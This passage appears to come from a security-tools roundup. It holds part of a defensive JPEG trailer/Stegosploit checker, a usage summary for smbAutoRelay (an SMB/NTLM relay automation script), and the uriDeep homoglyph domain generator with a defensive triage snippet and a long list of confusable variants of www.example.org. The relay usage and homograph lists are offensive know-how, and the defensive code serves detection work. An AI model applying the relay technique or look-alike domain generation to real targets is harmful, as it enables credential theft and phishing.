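        if marker == 0xFF:                            # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                            # EOI
            return pos + 2
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length
            pos += 2
            continue
        if pos + 4 > len(data):
            return -1
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        if seg_len < 2:
            return -1
        pos += 2 + seg_len
        if marker == 0xDA:                            # SOS: skip entropy-coded data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                             # a real marker ends the scan
                pos += 1
    return -1


def inspect_jpeg(data: bytes) -> Dict[str, object]:
    """Summarise what follows the image data of a JPEG file."""
    end = jpeg_end_offset(data)
    if end < 0:
        return {"valid_jpeg": False, "trailing_bytes": 0,
                "stegosploit_signature": False, "suspicious": False}
    trailer = data[end:]
    return {"valid_jpeg": True,
            "trailing_bytes": len(trailer),
            "stegosploit_signature": STEGOSPLOIT_TAIL in trailer,
            "suspicious": bool(trailer.strip(b"\x00"))}   # ignore pure zero padding


def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload


# Constructed sample. The comment segment contains the bytes FF D9 on purpose:
# a naive search for the first FF D9 would stop inside it.
CLEAN_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xFE, b"note\xff\xd9x")
    + _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\xff\x00\x56\xff\xd0\x78"             # scan data: stuffed FF00, RST0
    + b"\xff\xd9"
)

if __name__ == "__main__":
    print(inspect_jpeg(CLEAN_JPEG))
    print(inspect_jpeg(CLEAN_JPEG + STEGOSPLOIT_TAIL))
```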


    smbAutoRelay - Provides The Automation Of SMB/NTLM Relay Technique For Pentesting And Red Teaming Exercises In Active Directory Environments



    SMB AutoRelay provides the automation of SMB/NTLM Relay technique for pentesting and red teaming exercises in active directory environments.


    Usage

    Syntax: ./smbAutoRelay.sh -i <interface> -t <file> [-q] [-d]

    Example: ./smbAutoRelay.sh -i eth0 -t ./targets.txt

    Notice that the targets file should contain just the IP addresses of each target, one per line, to which you want to try the SMB/NTLM Relay technique.

    Run ./smbAutoRelay.sh [-h] to see other options.



    Software which installs in the current directory [ needed to run properly ]

    Software which installs through apt, if not installed [ needed to run properly ]

    • tmux
    • rlwrap
    • python
    • python3
    • netcat
    • wget
    • xterm
    • net-tools

    TODOs
    • Add the possibility to capture and crack the NetNTLM hashes.
    • Adapt it to use terminal profiles



    uriDeep - Unicode Encoding Attacks With Machine Learning



    Unicode encoding attacks with machine learning. Tool based on machine learning to create amazing fake domains using confusables. Some domains can deceive IDN policies (Chrome & Firefox).

    I created the best (big) dictionary of confusables using neural networks. It is used in the tool and it can be downloaded from: https://github.com/mindcrypt/uriDeep/blob/master/data/deepDiccConfusables.txt
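
    A defensive check for observed domains, as an added example that is not uriDeep's code: it separates names that IDNA normalization turns back into the protected domain from names that stay distinct look-alikes. It uses Python's built-in idna codec (IDNA 2003), a rough script test based on Unicode character names, and NFKD folding in place of a confusables dictionary; all three are assumptions of this sketch.

```python
"""Triage observed domains against a protected domain (defensive look-alike check)."""
import unicodedata
from typing import Dict, List, Optional


def to_ascii(domain: str) -> Optional[str]:
    """ASCII (punycode) form as produced by Python's idna codec, or None if invalid."""
    try:
        return domain.encode("idna").decode("ascii")
    except UnicodeError:
        return None


def skeleton(domain: str) -> str:
    """Fold compatibility forms and strip accents: a cheap stand-in for a confusables table."""
    decomposed = unicodedata.normalize("NFKD", domain)
    return "".join(c for c in decomposed if not unicodedata.combining(c)).casefold()


def label_scripts(label: str) -> List[str]:
    """Rough script names (LATIN, GREEK, CYRILLIC, ...) taken from character names."""
    return sorted({unicodedata.name(c, "UNKNOWN").split()[0] for c in label if c.isalpha()})


def triage(candidate: str, protected: str) -> Dict[str, object]:
    ascii_form = to_ascii(candidate)
    mixed = [lab for lab in candidate.split(".") if len(label_scripts(lab)) > 1]
    skeleton_match = skeleton(candidate) == protected.casefold()
    if ascii_form is None:
        verdict = "invalid-idn"
    elif ascii_form == protected:
        verdict = "same-domain"        # normalizes to the real name, nothing to register
    elif skeleton_match or mixed:
        verdict = "lookalike"          # distinct name that imitates or mixes scripts
    else:
        verdict = "unrelated"
    return {"ascii": ascii_form, "skeleton_match": skeleton_match,
            "mixed_script_labels": mixed, "verdict": verdict}


PROTECTED = "www.example.org"
# Candidates taken from the kinds of names in the tool output on this page.
SAMPLES = [
    "www.\u00e9xample.org",       # e with acute accent
    "www.ex\U0001d41ample.org",   # mathematical bold small a
    "www.\u0411xample.org",       # Cyrillic capital Be
    "www.example.com",            # plain ASCII, different domain
]

if __name__ == "__main__":
    for name in SAMPLES:
        print(name, triage(name, PROTECTED))
```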


    _mindcrypt@kali:~/tool/uriDeep# python3 uriDeep.py

    _ ___
    /\ /\ _ __(_) / \___ ___ _ __
    / / \ \ '__| | / /\ / _ \/ _ \ '_ \
    \ \_/ / | | |/ /_// __/ __/ |_) |
    \___/|_| |_/___,' \___|\___| .__/
    |_|

    Version Beta
    Authors: Alfonso Muñoz (@mindcrypt)
    Miguel Hernández (@MiguelHzBz)

    usage: uriDeep.py [-h] [-d, --domain DOMAIN] [-i FILEINPUT] [-F [FLIPPER]]
    [-H [HOMOGLYPH]] [-l] [-S [SUBSTITUTION]] [-c] [-w] [-vt]
    [-key API] [-o OUTPUTFILE]

    UriDeep: Tool based on machine learning to create amazing fake domains using
    confusables. Some domains can deceive IDN policies

    optional arguments:
    -h, --help show this help message and exit
    -d, --domain DOMAIN check similar domains to this one
    -i FILEINPUT, --input FILEINPUT
    List of targets. One input per line.
    -F [FLIPPER], --flipper [FLIPPER]
    Execute flipping attack
    -H [HOMOGLYPH], --homoglyph [HOMOGLYPH]
    Execute homoglyph attack with full table of
    confusables
    -l, --light To create fake domains that could deceive IDN policies
    -S [SUBSTITUTION], --substitution [SUBSTITUTION]
    Execute substitution attack
    -c, --check check if this domain is alive
    -w, --whois check whois
    -vt, --virustotal check Virus Total
    -key API, --api-key API
    VirusTotal API Key
    -o OUTPUTFILE, --output OUTPUTFILE
    Output file
    None
    Need one type of input, {-i --input} or {-d --domain}
    root@kali:~/tool/uriDeep# python3 uriDeep.py -H -d www.example.org

    _ ___
    /\ /\ _ __(_) / \___ ___ _ __
    / / \ \ '__| | / /\ / _ \/ _ \ '_ \
    \ \_/ / | | |/ /_// __/ __/ |_) |
    \___/|_| |_/___,' \___|\___| .__/
    |_|

    Version Beta
    Authors: Alfonso Muñoz (@mindcrypt)
    Miguel Hernández (@MiguelHzBz)

    Domain target: www.example.org
    Option selected: Homoglyph attack
    Option selected: Full confusables
    Generate similar domains...
    Similars domains to example: 722
    {'domain_punnycode': b'www.xn--exmple-jta.org', 'domain': 'www.exàmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝑷le.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝖑e.org'}
    {'domain_punnycode': b'www.xn--xample-vo8d.org', 'domain': 'www.ⲉxample.org'}
    {'domain_punnycode': b'www.xn--xample-v4a.org', 'domain': 'www.Ęxample.org'}
    {'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.examplΕ.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.𝗘xample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝘹ample.org'}
    {'domain_punnycode': b'www.xn--exmple-cbc.org', 'domain': 'www.exǣmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝖕le.org'}
    {'domain_punnycode': b'www.xn--eample-p84d.org', 'domain': 'www.e⨰ample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝑳e.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝖷ample.org'}
    {'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.exampl𝛆.org'}
    {'domain_punnycode': b'www.xn--exampl-88b.org', 'domain': 'www.examplƎ.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exampℒe.org'}
    {'domain_punnycode': b'www.xn--exmple-qhc.org', 'domain': 'www.exȂmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝔓le.org'}
    {'domain_punnycode': b'www.xn--exampe-0va.org', 'domain': 'www.exampÌe.org'}
    {'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.exampl𝛦.org'}
    {'domain_punnycode': b'www.xn--xample-h4a.org', 'domain': 'www.ėxample.org'}
    {'domain_punnycode': b'www.xn--examle-sdf.org', 'domain': 'www.examϼle.org'}
    {'domain_punnycode': b'www.3xample.org', 'domain': 'www.3xample.org'}
    {'domain_punnycode': b'www.xn--exampe-mm4w.org', 'domain': 'www.exampᏓe.org'}
    {'domain_punnycode': b'www.xn--exampl-8hc.org', 'domain': 'www.examplȅ.org'}
    {'domain_punnycode': b'www.xn--exaple-5hu.org', 'domain': 'www.exa๓ple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝓔.org'}
    {'domain_punnycode': b'www.xn--exmple-xyc.org', 'domain': 'www.exƏmple.org'}
    {'domain_punnycode': b'www.xn--exmple-j549a.org', 'domain': 'www.ex\U000104e0mple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝕃e.org'}
    {'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.examΡle.org'}
    {'domain_punnycode': b'www.xn--eample-pr6a.org', 'domain': 'www.eᚷample.org'}
    {'domain_punnycode': b'www.xn--exampie-cie.org', 'domain': 'www.exampİe.org'}
    {'domain_punnycode': b'www.xn--exampl-u3a.org', 'domain': 'www.examplē.org'}
    {'domain_punnycode': b'www.xn--eample-wy4a.org', 'domain': 'www.eᕽample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝕷e.org'}
    {'domain_punnycode': b'www.xn--exampe-0ic.org', 'domain': 'www.exampȉe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝑋ample.org'}
    {'domain_punnycode': b'www.xn--exmple-cua.org', 'domain': 'www.exämple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝔼.org'}
    {'domain_punnycode': b'www.xn--xample-od4w.org', 'domain': 'www.Ꭷxample.org'}
    {'domain_punnycode': b'www.xn--exampl-ghg.org', 'domain': 'www.examplҽ.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.𝖊xample.org'}
    {'domain_punnycode': b'www.xn--eample-3n9d.org', 'domain': 'www.eⴴample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝐩le.org'}
    {'domain_punnycode': b'www.xn--exampe-tvb.org', 'domain': 'www.exampƚe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝔪ple.org'}
    {'domain_punnycode': b'www.xn--exmple-4339a.org', 'domain': 'www.ex𐐂mple.org'}
    {'domain_punnycode': b'www.xn--exaple-ym5a.org', 'domain': 'www.exaᗰple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝕡le.org'}
    {'domain_punnycode': b'www.exampie.org', 'domain': 'www.exampIe.org'}
    {'domain_punnycode': b'www.xn--exmple-cze7796c.org', 'domain': 'www.exᾈmple.org'}
    {'domain_punnycode': b'www.exampie.org', 'domain': 'www.exampⅠe.org'}
    {'domain_punnycode': b'www.xn--eample-ww5d.org', 'domain': 'www.e⪤ample.org'}
    {'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝝖mple.org'}
    {'domain_punnycode': b'www.xn--exampe-7639a.org', 'domain': 'www.examp𐐹e.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝚕e.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝓍ample.org'}
    {'domain_punnycode': b'www.xn--xample-hr4w.org', 'domain': 'www.ꮼxample.org'}
    {'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.e𝝬ample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.𝗲xample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝖾.org'}
    {'domain_punnycode': b'www.xn--exmple-xmg.org', 'domain': 'www.exӘmple.org'}
    {'domain_punnycode': b'www.xn--xample-vtf.org', 'domain': 'www.эxample.org'}
    {'domain_punnycode': b'www.xn--exampe-t2c.org', 'domain': 'www.exampɬe.org'}
    {'domain_punnycode': b'www.exaMple.org', 'domain': 'www.exaMple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝗣le.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examplℯ.org'}
    {'domain_punnycode': b'www.xn--exmple-4za.org', 'domain': 'www.exĀmple.org'}
    {'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.e𝞦ample.org'}
    {'domain_punnycode': b'www.xn--exampl-u3a.org', 'domain': 'www.examplĒ.org'}
    {'domain_punnycode': b'www.xn--exampl-1we.org', 'domain': 'www.examplΈ.org'}
    {'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝐈e.org'}
    {'domain_punnycode': b'www.xn--xample-hva.org', 'domain': 'www.êxample.org'}
    {'domain_punnycode': b'www.xn--examle-6l6b.org', 'domain': 'www.examᵱle.org'}
    {'domain_punnycode': b'www.exAmple.org', 'domain': 'www.exAmple.org'}
    {'domain_punnycode': b'www.xn--exampl-8y8b.org', 'domain': 'www.examplἘ.org'}
    {'domain_punnycode': b'www.xn--xample-9yc.org', 'domain': 'www.ℇxample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝗲.org'}
    {'domain_punnycode': b'www.xn--eample-ir3d.org', 'domain': 'www.e⤫ample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝘔ple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exaMple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝗘.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝘭e.org'}
    {'domain_punnycode': b'www.xn--exampe-fxe.org', 'domain': 'www.exampίe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝚙le.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝑎mple.org'}
    {'domain_punnycode': b'www.xn--exampl-gz8b.org', 'domain': 'www.examplἙ.org'}
    {'domain_punnycode': b'www.xn--exampl-uva.org', 'domain': 'www.examplë.org'}
    {'domain_punnycode': b'www.xn--exmple-q339a.org', 'domain': 'www.ex𐐨mple.org'}
    {'domain_punnycode': b'www.xn--xample-o3a.org', 'domain': 'www.Ēxample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.ⅇxample.org'}
    {'domain_punnycode': b'www.xn--exaple-yze.org', 'domain': 'www.exa𝜧ple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝖺mple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝔸mple.org'}
    {'domain_punnycode': b'www.xn--exampe-tf4w.org', 'domain': 'www.exampᎱe.org'}
    {'domain_punnycode': b'www.xn--exaple-yx6a.org', 'domain': 'www.exaᛖple.org'}
    {'domain_punnycode': b'www.xn--exampl-8hc.org', 'domain': 'www.examplȄ.org'}
    {'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝜬le.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝒍e.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝖃ample.org'}
    {'domain_punnycode': b'www.xn--exampe-t9a.org', 'domain': 'www.exampıe.org'}
    {'domain_punnycode': b'www.xn--examle-6t8d.org', 'domain': 'www.examⲣle.org'}
    {'domain_punnycode': b'www.xn--exampe-m6b.org', 'domain': 'www.exampǐe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examplE.org'}
    {'domain_punnycode': b'www.xn--exampl-gox.org', 'domain': 'www.examplၿ.org'}
    {'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝝰mple.org'}
    {'domain_punnycode': b'www.xn--exampe-m2c.org', 'domain': 'www.exampɫe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝖝ample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.𝔢xample.org'}
    {'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.Εxample.org'}
    {'domain_punnycode': b'www.xn--xample-2y8b.org', 'domain': 'www.Ἐxample.org'}
    {'domain_punnycode': b'www.xn--exaple-k1t.org', 'domain': 'www.exaฅple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝑨mple.org'}
    {'domain_punnycode': b'www.xn--exmple-jw8b.org', 'domain': 'www.exἋmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝕄ple.org'}
    {'domain_punnycode': b'www.xn--exaple-ky6v.org', 'domain': 'www.exaꙦple.org'}
    {'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝞺le.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝕸ple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝔄mple.org'}
    {'domain_punnycode': b'www.xn--exmple-cw49a.org', 'domain': 'www.ex\U000104b2mple.org'}
    {'domain_punnycode': b'www.xn--exmple-xv8b.org', 'domain': 'www.exἈmple.org'}
    {'domain_punnycode': b'www.xn--exmple-qhc.org', 'domain': 'www.exȃmple.org'}
    {'domain_punnycode': b'www.xn--examle-erf.org', 'domain': 'www.examРle.org'}
    {'domain_punnycode': b'www.xn--exampl-14a.org', 'domain': 'www.examplĘ.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝐏le.org'}
    {'domain_punnycode': b'www.xn--xample-oxc.org', 'domain': 'www.Ɓxample.org'}
    {'domain_punnycode': b'www.xn--eample-bfg.org', 'domain': 'www.eҲample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.eⅩample.org'}
    {'domain_punnycode': b'www.xn--exmple-xq4w.org', 'domain': 'www.exꮹmple.org'}
    {'domain_punnycode': b'www.xn--exmple-x0a.org', 'domain': 'www.exĄmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝑿ample.org'}
    {'domain_punnycode': b'www.xn--exmple-qlg.org', 'domain': 'www.exӒmple.org'}
    {'domain_punnycode': b'www.xn--xample-vk4w.org', 'domain': 'www.ꮛxample.org'}
    {'domain_punnycode': b'www.xn--xample-vwe.org', 'domain': 'www.Έxample.org'}
    {'domain_punnycode': b'www.xn--exaple-yze.org', 'domain': 'www.exaΜple.org'}
    {'domain_punnycode': b'www.xn--exampl-1t5a.org', 'domain': 'www.examplᘓ.org'}
    {'domain_punnycode': b'www.xn--exampe-fze.org', 'domain': 'www.exampΙe.org'}
    {'domain_punnycode': b'www.xn--examle-6t8d.org', 'domain': 'www.examⲢle.org'}
    {'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.examρle.org'}
    {'domain_punnycode': b'www.xn--exampe-7oj.org', 'domain': 'www.examp۱e.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝓜ple.org'}
    {'domain_punnycode': b'www.xn--exampe-tvf.org', 'domain': 'www.exampіe.org'}
    {'domain_punnycode': b'www.xn--xample-ofx.org', 'domain': 'www.ၔxample.org'}
    {'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝕴e.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝚇ample.org'}
    {'domain_punnycode': b'www.xn--exmple-jua.org', 'domain': 'www.exÅmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝔛ample.org'}
    {'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.exampl𝝚.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝙀.org'}
    {'domain_punnycode': b'www.xn--exmple-4f5c.org', 'domain': 'www.ex⍺mple.org'}
    {'domain_punnycode': b'www.xn--exaple-r3c.org', 'domain': 'www.exaɱple.org'}
    {'domain_punnycode': b'www.ex4mple.org', 'domain': 'www.ex4mple.org'}
    {'domain_punnycode': b'www.xn--eample-wv5b.org', 'domain': 'www.eᳳample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝐦ple.org'}
    {'domain_punnycode': b'www.xn--exampe-tvb.org', 'domain': 'www.exampȽe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.example.org'}
    {'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.exαmple.org'}
    {'domain_punnycode': b'www.xn--eample-bsf.org', 'domain': 'www.eхample.org'}
    {'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝜜mple.org'}
    {'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝖨e.org'}
    {'domain_punnycode': b'www.exampie.org', 'domain': 'www.exampℹe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝕒mple.org'}
    {'domain_punnycode': b'www.xn--xample-hmg.org', 'domain': 'www.Ӗxample.org'}
    {'domain_punnycode': b'www.xn--exaple-yze.org', 'domain': 'www.exa𝝡ple.org'}
    {'domain_punnycode': b'www.xn--example-0ma.org', 'domain': 'www.exampŀe.org'}
    {'domain_punnycode': b'www.xn--exmple-xmg.org', 'domain': 'www.exәmple.org'}
    {'domain_punnycode': b'www.xn--exampe-to4w.org', 'domain': 'www.exampᏞe.org'}
    {'domain_punnycode': b'www.xn--exmple-c639a.org', 'domain': 'www.ex𐐵mple.org'}
    {'domain_punnycode': b'www.xn--exmple-45b.org', 'domain': 'www.exǍmple.org'}
    {'domain_punnycode': b'www.examplc.org', 'domain': 'www.examplⅽ.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.𝑒xample.org'}
    {'domain_punnycode': b'www.xn--exampl-8of.org', 'domain': 'www.examplе.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝖆mple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝙻e.org'}
    {'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.𝚬xample.org'}
    {'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.e𝛸ample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.example.org'}
    {'domain_punnycode': b'www.eXample.org', 'domain': 'www.eXample.org'}
    {'domain_punnycode': b'www.xn--exmple-48q.org', 'domain': 'www.exఞmple.org'}
    {'domain_punnycode': b'www.examp1e.org', 'domain': 'www.examp𝟭e.org'}
    {'domain_punnycode': b'www.xn--exmple-c65b.org', 'domain': 'www.exᴧmple.org'}
    {'domain_punnycode': b'www.xn--exaple-yze.org', 'domain': 'www.exa𝞛ple.org'}
    {'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝙄e.org'}
    {'domain_punnycode': b'www.xn--exampe-77a.org', 'domain': 'www.exampĩe.org'}
    {'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝛂mple.org'}
    {'domain_punnycode': b'www.xn--exmple-4v8b.org', 'domain': 'www.exἉmple.org'}
    {'domain_punnycode': b'www.xn--eample-i84d.org', 'domain': 'www.e⨯ample.org'}
    {'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.𝜺xample.org'}
    {'domain_punnycode': b'www.xn--xample-v339a.org', 'domain': 'www.𐐁xample.org'}
    {'domain_punnycode': b'www.Example.org', 'domain': 'www.Example.org'}
    {'domain_punnycode': b'www.xn--exaple-k8t.org', 'domain': 'www.exaศple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examℙle.org'}
    {'domain_punnycode': b'www.xn--exampe-0cb.org', 'domain': 'www.exampĻe.org'}
    {'domain_punnycode': b'www.xn--exmple-qze.org', 'domain': 'www.exΛmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝖒ple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝙭ample.org'}
    {'domain_punnycode': b'www.xn--exampl-nva.org', 'domain': 'www.examplê.org'}
    {'domain_punnycode': b'www.xn--examle-zcf.org', 'domain': 'www.examϷle.org'}
    {'domain_punnycode': b'www.xn--exmple-qwe.org', 'domain': 'www.exΆmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝑃le.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.𝚎xample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝙿le.org'}
    {'domain_punnycode': b'www.xn--examle-e35b.org', 'domain': 'www.examᴘle.org'}
    {'domain_punnycode': b'www.xn--eample-31e.org', 'domain': 'www.e𝜲ample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝘱le.org'}
    {'domain_punnycode': b'www.xn--exaple-543w.org', 'domain': 'www.exaꭑple.org'}
    {'domain_punnycode': b'www.xn--xample-h6e.org', 'domain': 'www.Ϝxample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝚊mple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝓧ample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝗫ample.org'}
    {'domain_punnycode': b'www.xn--exampe-f38d.org', 'domain': 'www.exampⳐe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝙇e.org'}
    {'domain_punnycode': b'www.xn--exmple-ce5a.org', 'domain': 'www.exᗅmple.org'}
    {'domain_punnycode': b'www.xn--exampe-to6a.org', 'domain': 'www.exampᚨe.org'}
    {'domain_punnycode': b'www.xn--examle-ze5c.org', 'domain': 'www.exam⍴le.org'}
    {'domain_punnycode': b'www.xn--examle-erf.org', 'domain': 'www.examрle.org'}
    {'domain_punnycode': b'www.xn--exmple-j0a.org', 'domain': 'www.exĂmple.org'}
    {'domain_punnycode': b'www.xn--exampl-8ua.org', 'domain': 'www.examplÈ.org'}
    {'domain_punnycode': b'www.xn--exampe-m8a.org', 'domain': 'www.exampīe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝗆ple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝗅e.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝙥le.org'}
    {'domain_punnycode': b'www.xn--exampl-gvf.org', 'domain': 'www.examplЄ.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝖯le.org'}
    {'domain_punnycode': b'www.xn--exampe-7db.org', 'domain': 'www.exampłe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝔁ample.org'}
    {'domain_punnycode': b'www.exanple.org', 'domain': 'www.exanple.org'}
    {'domain_punnycode': b'www.xn--example-0ma.org', 'domain': 'www.exampĿe.org'}
    {'domain_punnycode': b'www.xn--exampe-005b.org', 'domain': 'www.exampᴌe.org'}
    {'domain_punnycode': b'www.xn--exampl-nt4v.org', 'domain': 'www.examplꓰ.org'}
    {'domain_punnycode': b'www.xn--exmple-cj9b.org', 'domain': 'www.exᾺmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝙈ple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝑬.org'}
    {'domain_punnycode': b'www.xn--exampe-fxe.org', 'domain': 'www.exampΊe.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝖤.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.𝐞xample.org'}
    {'domain_punnycode': b'www.exampl3.org', 'domain': 'www.exampl3.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝙼ple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝒫le.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝓟le.org'}
    {'domain_punnycode': b'www.xn--eample-353w.org', 'domain': 'www.eꭖample.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.ℰxample.org'}
    {'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.εxample.org'}
    {'domain_punnycode': b'www.xn--exampl-uh6v.org', 'domain': 'www.examplꘓ.org'}
    {'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝟈le.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.e𝘅ample.org'}
    {'domain_punnycode': b'www.xn--exmple-chc.org', 'domain': 'www.exȁmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝑀ple.org'}
    {'domain_punnycode': b'www.xn--exaple-5p4v.org', 'domain': 'www.exaꓟple.org'}
    {'domain_punnycode': b'www.xn--exampl-8of.org', 'domain': 'www.examplЕ.org'}
    {'domain_punnycode': b'www.xn--xample-28b.org', 'domain': 'www.Ǝxample.org'}
    {'domain_punnycode': b'www.xn--exampe-tr4w.org', 'domain': 'www.exampᏭe.org'}
    {'domain_punnycode': b'www.ex@mple.org', 'domain': 'www.ex@mple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝒎ple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝓹le.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.𝒆xample.org'}
    {'domain_punnycode': b'www.xn--exmple-qt5a.org', 'domain': 'www.exᘒmple.org'}
    {'domain_punnycode': b'www.example.org', 'domain': 'www.𝖾xample.org'}
    {'domain_punnycode': b'www.xn--xample-hq4c.org', 'domain': 'www.⋿xample.org'}
    {'domain_punnycode': b'www.xn--exampe-0kg.org', 'domain': 'www.exampӏe.org'}
